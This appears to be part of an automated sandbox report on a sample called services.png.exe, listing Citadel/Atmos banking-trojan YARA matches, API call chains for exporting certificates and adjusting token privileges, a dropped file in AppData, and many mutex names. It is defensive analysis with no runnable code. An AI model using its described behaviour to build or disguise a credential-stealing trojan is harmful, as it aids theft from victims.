                        Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: classification engineClassification label: mal100.phis.bank.troj.spyw.evad.winEXE@10/32@9/5
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0042CC39 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,0_2_0042CC39
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0042CDAE CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_0042CDAE
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0283CC39 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,0_2_0283CC39
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0283CDAE CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_0283CDAE
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0042CC39 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,1_2_0042CC39
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0042CDAE CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,1_2_0042CDAE
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0043412F GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_0043412F
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0284412F GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_0284412F
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0043412F GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_0043412F
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00437828 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00437828
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0043E06E CoCreateInstance,VariantInit,SysAllocString,VariantClear,0_2_0043E06E
                        Source: C:\Users\user\Desktop\services.png.exeFile created: C:\Users\user\AppData\Roaming\AzockavulieJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0ED6156040A959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07560560492949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0496E5604AE9A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F96D56041E999113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08170560466849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\4E9E1087FCAEF1D723957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D685604AA9C9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F561560412959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D041695604A69D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0917E5604768A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A57D560442899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\C05314A87263F5F823957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0397D5604DE899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0756B5604929F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D171560436859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD6156045A959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0516B5604B69F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0796856049E9C9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\DB9E102569AEF17523957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D57D560432899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06561560482959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E97156040E859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D56B5604329F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E174560406809113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0FD6056041A949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7E56046A8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D635604BA979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\48AE68A7FA9E89F723957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D625604EA969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD7F56043A8B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D02D785604CA8C9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06D7956048A8D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B17B5604568F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0917A5604768E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0697F56048E8B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D021605604C6949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0896F56046E9B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D795604AA8D9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D01D615604FA959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A163560446979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97756041E839113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D045735604A2879113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A96156044E959113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0216B5604C69F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B563560452979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\26F463EC94C482BC23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0457A5604A28E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0117F5604F68B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Local\BBAB13DE099BF28E23957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A160560446949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D001715604E6859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09572560472869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09176560476829113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A95856044EAC9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0456D5604A2999113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0197F5604FE8B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\0F6E7BC8BD5E9A9823957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D7156049A859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD7C56042A889113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B17C560456889113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97E56041E8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F576560412829113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F56D560412999113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6756043A939113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07571560492859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C174560426809113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0416E5604A69A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD7656045A829113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F57F5604128B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\5F9ABCC1EDAA5D9123957950C461BE47
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D7E5604EA8A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D97156043E859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E571560402859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D7356049A879113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07575560492819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD6B56045A9F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E163560406979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D7C5604DA889113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E175560406819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D015635604F2979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD6E56042A9A9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B96256045E969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0856F5604629B9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D011725604F6869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0796356049E979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09560560472949113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0997C56047E889113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08563560462979113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08175560466819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F17D560416899113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D041705604A6849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D025625604C2969113
                        Source: C:\Users\user\Desktop\services.png.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A96656044E929113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0697256048E869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0197A5604FE8E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D041625604A6969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0056B5604E29F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D725604EA869113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E56A5604029E9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07162560496969113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07170560496849113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09D7156047A859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06575560482819113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C97156042E859113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0397B5604DE8F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F57B5604128F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0417B5604A68F9113
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F17F5604168B9113
